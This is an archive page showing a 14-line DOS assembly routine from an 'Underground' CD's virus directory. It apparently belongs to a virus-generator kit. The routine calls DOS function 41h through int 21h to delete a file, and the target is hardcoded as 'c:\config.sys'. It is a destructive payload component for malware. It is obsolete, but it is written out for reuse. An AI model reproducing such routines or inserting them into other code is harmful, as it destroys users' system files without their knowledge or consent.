home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / virii / virgen / ivp17 / Erasef.rtn < prev    next >
Encoding:
Text File  |  1992-12-26  |  217 b   |  14 lines

  1. ;  Erases the file specified.
  2. ;  Edit the name for the file.
  3. ;  DX=Location of file name.
  4.  
  5.         mov     ah,41h
  6.  
  7.         int     21h
  8.         jmp     continue
  9.  
  10. erasethis db 'c:\config.sys',0
  11.  
  12. continue:
  13.  
  14.